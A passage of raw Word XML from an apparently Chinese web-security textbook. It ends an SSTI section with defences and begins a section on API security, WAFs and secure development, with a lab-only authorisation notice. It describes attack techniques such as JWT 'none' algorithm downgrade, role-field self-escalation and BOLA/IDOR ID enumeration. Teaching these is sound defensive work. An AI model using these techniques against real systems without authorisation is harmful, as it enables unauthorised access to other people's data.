        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的无逻辑模式），或为引擎配置严格的沙箱。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">输出上下文控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：完成渲染后，再进行输出编码，但这不能杜绝模板注入本身，只能缓解跨站风险。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测与阻断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队可以检测包含模板表达式模式（</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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）的请求，但这些模式也可能出现在正常文本中，需结合上下文分析。更可靠的方法是检测响应中是否有公式求值的结果（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），但这属于带外检测，较难规模化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对称是本书的基本原则：每讲述一种攻击，都必须明确防御方案。在进阶</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全中，反序列化与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的风险等级极高，但防御手段同样清晰</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> —— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">坚守“数据不成为代码”的信条，即可从源头消除该类漏洞。后续小节将继续讨论</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在整个纵深防线中的角色。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="223"/>
    <w:bookmarkStart w:id="224" w:name="api-安全waf-与安全开发习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2 API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全·WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与安全开发·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">各位读者，在切入本节正文之前，请务必确认已完成以下前置知识的学习，并对实验环境边界有清醒认知：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框（学习本节前需掌握）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话管理基础（交叉回指本卷第八章“HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全要点与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截”）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已掌握注入类漏洞（SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、命令注入）的第一性原理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“数据与代码边界混淆”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（交叉回指本卷第九章“注入类”）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已阅读《从位到物联》第三十章“IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用层协议”中关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CoAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的交互模型及安全基础。本节引用其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> REST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风格架构与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景下的权限模型，但不重复讲授协议细节。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建议已完成本卷第十一、十二章前文关于反序列化与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的学习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（本节所有可操作内容）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节涉及的一切“构造请求”、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“重放”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“绕过测试”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Fuzzing”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等操作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅限于在读者完全拥有并控制的隔离实验网络环境内执行，或以书面方式获得授权的第三方靶机（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy、HackTheBox、TryHackMe、OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶场等）上进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">严禁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在未获明确书面授权的任何生产系统、第三方服务或云平台接口上执行本节命令。进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模糊测试与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绕过研究时，实验网络必须与公网及生产环境严格物理或逻辑隔离。任何未经授权访问他人计算机信息系统的行为均属违法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在遵循三态标注（①标准/通用原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②环境相关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③简化示意）的原则下，我们正式进入本节内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全从“人机交互的网页安全”向“机器对机器的接口安全”演进的图景中，攻击面发生了根本性迁移。如果说传统注入与跨站脚本利用的是人类用户浏览器的信任与输入解析歧义，那么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全领域被违反的核心假设则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“接口的设计意图与实际调用者的能力边界始终保持一致”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——即开发者假设客户端只会按照文档规定的路径、参数与权限调用接口，而攻击者天然不受此约束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这种假设的崩塌体现在三个层面。对攻击者而言，API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是现代应用的“骨骼系统”：一旦掌握端点、参数与认证令牌的关系，就可以通过枚举、越权、竞态条件等方式系统性地攫取数据或控制后台功能，攻击的自动化程度与隐蔽性远超传统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">爬虫。对防御者而言，API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的本质挑战是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">在不可信环境中为每一个分发出去的功能端点实施持续的、细粒度的访问控制与输入验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，且必须接受一个残酷前提：攻击者不仅会构造合法的入参，更会刻意构造那些文档上“不存在的”、边界处的畸形请求来探测防护盲区。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本小节将依次展开三个相互咬合的主题：API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的核心风险与防御纵深（重点剖析对象级越权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BOLA）、WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在纵深防御中的真实定位与可绕过性（标②环境相关）、以及安全开发生命周期（SDL）如何将防御左移以降低成本。最终，我们将这三个维度收敛为一个统一的防御总览框，并以习题和延伸阅读帮助读者构建可迁移的分析框架。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="224"/>
    <w:bookmarkStart w:id="225" w:name="api-安全的攻击面与第一性原理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的攻击面与第一性原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用的功能大都通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API（Application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Programming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Interface，应用程序编程接口）暴露，形态涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RESTful </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风格（基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法的资源操作）、GraphQL（基于查询声明获取所需字段）以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景下常见的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主题订阅发布与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CoAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> REST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风格交互（相关协议交互模型已在《从位到物联》第三十章详述，此处直接使用其结论：这些协议本质上都在主体间传递结构化的操作请求，且各自存在认证授权模型）。与传统的“服务端渲染</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML→用户点击链接/提交表单→浏览器重绘页面”模式不同，API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将数据与操作以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等机器可解析的格式直接暴露，攻击者不再需要通过解析前端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来猜测后端逻辑，可以直接通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具观察请求、枚举参数、尝试未授权的资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第一性原理重述：API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全的核心问题是“访问控制边界的完整性”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。任何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端点都可以被抽象为一个函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">f(subject, object, action, parameters)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。安全的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须在每次执行该函数前，独立地验证发出请求的主体（subject）对目标对象（object）拥有执行该操作（action）的权限，并且所传入的参数（parameters）经过严格的类型与范围校验。一旦开发者假设“客户端按照预定义流程操作，故省略某些校验步骤”，攻击者就可以通过直接篡改序列号、切换用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法等手段，跨越这一缺失的边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的具体攻击面可归纳为三个核心风险域：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">其一，认证与授权缺失或脆弱。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角：寻找无需认证即可访问的管理端点、调试接口或未在文档中公开的“隐藏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API”（Hidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API）。即便接口要求认证，也需测试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT（JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token）的签名算法是否可降级为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（原理见本卷第十一章）、密钥是否可爆破、令牌是否在登出后依然有效、令牌是否可由低权限用户的令牌通过修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的角色字段（role/scope）而“自我提权”。防御视角：每增加一个外部可访问的端点，就增加了一个认证与授权必须覆盖的单元；任何依赖“前端隐藏按钮”或“客户端不生成该请求”进行保护的做法，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层面失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">其二，对象级授权缺失（BOLA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全语境中，对象级越权（BOLA，Broken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Object Level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization）是最具破坏力、也是最容易被忽视的漏洞。其核心机理是：应用对请求中指向数据对象的资源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否属于当前用户缺乏服务端校验。攻击者观察到访问自身订单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/orders/1001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，随即枚举</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
